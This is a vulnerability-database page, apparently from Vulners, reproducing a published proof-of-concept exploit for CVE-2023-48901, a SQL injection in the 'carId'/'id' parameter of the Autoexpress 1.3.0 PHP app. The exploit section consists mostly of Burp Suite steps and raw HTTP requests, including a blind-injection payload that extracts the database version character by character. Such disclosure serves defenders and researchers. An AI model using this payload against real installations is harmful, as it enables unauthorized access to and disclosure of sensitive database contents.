Vulners
Lucene search
Tramyardg Autoexpress 1.3.0 SQL Injection Vulnerability
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | CVE-2023-48901 | 21 Mar 202404:15 | – | attackerkb |
 | Autoexpress 安全漏洞 | 21 Mar 202400:00 | – | cnnvd |
 | CVE-2023-48901 | 21 Mar 202400:00 | – | cve |
 | CVE-2023-48901 | 21 Mar 202400:00 | – | cvelist |
 | CVE-2023-48901 | 21 Mar 202404:15 | – | nvd |
 | Tramyardg Autoexpress 1.3.0 SQL Injection | 19 Mar 202400:00 | – | packetstorm |
 | PT-2024-13657 · Unknown · Tramyardg Autoexpress | 21 Mar 202400:00 | – | ptsecurity |
 | CVE-2023-48901 | 21 Mar 202400:00 | – | vulnrichment |
# Exploit Title: tramyardg autoexpress - SQL Injection
# Exploit Author: Scott White
# Vendor Homepage: https://github.com/tramyardg/autoexpress
# Version: v1.3.0
# Tested on: Ubuntu 22.04.3 LTS + Apache/2.4.52
# CVE : CVE-2023-48901
# References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48901
https://www.cve.org/CVERecord?id=CVE-2023-48901
# Description:
Autoexpress 1.3.0 allows SQL Injection via parameter 'carId' in /autoexpress/details.php and /autoexpress/admin/inventory.php. This vulnerability allows remote attackers to disclose sensitive information on affected installations.
# Proof of Concept:
+ Go to "http://localhost/autoexpress/admin/sign-in.php"
+ Sign in with Admin credentials
+ Click "Manage Inventory" --> "Actions" --> "Manage Photos" while having the "Intercept On" Burp Suite
+ Should receive a request of POST - /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=[ID]
+ Send it to Repeater
+ Captured Burp Request:
POST /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=3 HTTP/1.1
Host: localhost
Content-Length: 0
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Origin: http://localhost
Referer: http://localhost/autoexpress/admin/inventory.php?username=admin
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=PHPSESSIONID
Connection: close
# Sample Request
POST /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=3+and+(ascii(substring((select+version()),1,1)))+%3d+56 HTTP/1.1
Host: localhost
Content-Length: 0
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Origin: http://localhost
Referer: http://localhost/autoexpress/admin/inventory.php?username=admin
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=PHPSESSIONID
Connection: close
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Mar 2024 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
EPSS0.00705
SSVC